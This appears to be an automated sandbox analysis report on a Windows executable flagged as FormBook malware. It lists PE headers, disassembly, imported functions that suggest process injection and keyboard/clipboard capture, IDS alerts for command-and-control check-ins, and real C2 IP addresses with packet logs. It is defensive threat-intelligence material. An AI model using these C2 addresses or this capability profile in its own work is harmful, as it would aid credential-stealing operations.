                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x676210D2 [Wed Dec 18 00:01:22 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:948cc502fe9226992dce9417f952fce3
                                                                              Instruction
                                                                              call 00007EFE84CE2B63h
                                                                              jmp 00007EFE84CE246Fh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007EFE84CE264Dh
                                                                              mov dword ptr [esi], 0049FDF0h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                                              mov dword ptr [ecx], 0049FDF0h
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007EFE84CE261Ah
                                                                              mov dword ptr [esi], 0049FE0Ch
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                                              mov dword ptr [ecx], 0049FE0Ch
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              and dword ptr [eax], 00000000h
                                                                              and dword ptr [eax+04h], 00000000h
                                                                              push eax
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              add eax, 04h
                                                                              push eax
                                                                              call 00007EFE84CE520Dh
                                                                              pop ecx
                                                                              pop ecx
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              lea eax, dword ptr [ecx+04h]
                                                                              mov dword ptr [ecx], 0049FDD0h
                                                                              push eax
                                                                              call 00007EFE84CE5258h
                                                                              pop ecx
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              push eax
                                                                              call 00007EFE84CE5241h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              pop ecx
                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5e498 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x133000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x5e498 | 0x5e600 | 07c242f6dbc9014cc9ecd81e7af261cb | False | 0.9301091680463576 | data | 7.90002679251262 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x133000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x5575d | data | - | - | 1.0003313859646616
RT_GROUP_ICON | 0x131f18 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x131f90 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x131fa4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x131fb8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x131fcc | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1320a8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T18:54:13.696505+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49711 | 104.21.28.65 | 80 | TCP
2025-01-10T18:54:16.410603+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49712 | 104.21.28.65 | 80 | TCP
2025-01-10T18:54:18.902834+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49713 | 104.21.28.65 | 80 | TCP
2025-01-10T18:54:28.889425+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 172.67.138.138 | 80 | TCP
2025-01-10T18:54:31.436376+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49718 | 172.67.138.138 | 80 | TCP
2025-01-10T18:54:33.983258+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 172.67.138.138 | 80 | TCP
2025-01-10T18:55:20.841779+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49721 | 69.57.163.64 | 80 | TCP
2025-01-10T18:55:23.389513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49722 | 69.57.163.64 | 80 | TCP
2025-01-10T18:55:25.919332+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49723 | 69.57.163.64 | 80 | TCP
2025-01-10T18:55:35.244239+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49725 | 101.32.205.61 | 80 | TCP
2025-01-10T18:55:37.684101+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49726 | 101.32.205.61 | 80 | TCP
2025-01-10T18:55:40.303895+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 101.32.205.61 | 80 | TCP
2025-01-10T18:55:50.108422+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49729 | 103.159.36.66 | 80 | TCP
2025-01-10T18:55:52.655340+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49730 | 103.159.36.66 | 80 | TCP
2025-01-10T18:55:55.202255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49731 | 103.159.36.66 | 80 | TCP
2025-01-10T18:56:03.712870+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49733 | 103.168.172.37 | 80 | TCP
2025-01-10T18:56:07.234547+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49734 | 103.168.172.37 | 80 | TCP
2025-01-10T18:56:08.851280+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49735 | 103.168.172.37 | 80 | TCP
2025-01-10T18:56:17.936704+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49737 | 188.114.96.3 | 80 | TCP
2025-01-10T18:56:20.484198+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49738 | 188.114.96.3 | 80 | TCP
2025-01-10T18:56:23.030524+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49739 | 188.114.96.3 | 80 | TCP
2025-01-10T18:57:09.179374+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49741 | 84.32.84.32 | 80 | TCP
2025-01-10T18:57:11.524565+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49742 | 84.32.84.32 | 80 | TCP
2025-01-10T18:57:14.240369+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49743 | 84.32.84.32 | 80 | TCP
2025-01-10T18:57:23.090653+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49745 | 208.91.197.27 | 80 | TCP
2025-01-10T18:57:25.707410+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49746 | 208.91.197.27 | 80 | TCP
2025-01-10T18:57:28.193400+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49747 | 208.91.197.27 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jan 10, 2025 18:54:16.455097914 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.487497091 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.487517118 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.487636089 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.490880013 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.490901947 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.490942955 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.502831936 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.527137995 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.527156115 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.527251959 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.530531883 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.530574083 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.530612946 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.533416986 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.533436060 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.533478975 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.547348976 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.547425985 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.557288885 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.557310104 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.557537079 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.559906960 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.559922934 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.560039043 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.562716007 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.562732935 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.562789917 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.564270973 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.564296007 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.564343929 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:16.565176964 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.565264940 CET8049712104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:16.565310955 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:17.233311892 CET4971280192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.252449989 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.257616997 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.257798910 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.272700071 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.277688980 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.277729988 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.902743101 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.902765989 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.902785063 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.902833939 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.951960087 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.984308004 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.984329939 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.984411955 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:18.989336967 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.989667892 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:18.989733934 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.039187908 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.039208889 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.039274931 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.116373062 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.116511106 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.116588116 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.141258955 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.141329050 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.141377926 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.148802042 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.148825884 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.148891926 CET4971380192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:19.152308941 CET8049713104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:19.152328968 CET8049713104.21.28.65192.168.2.8
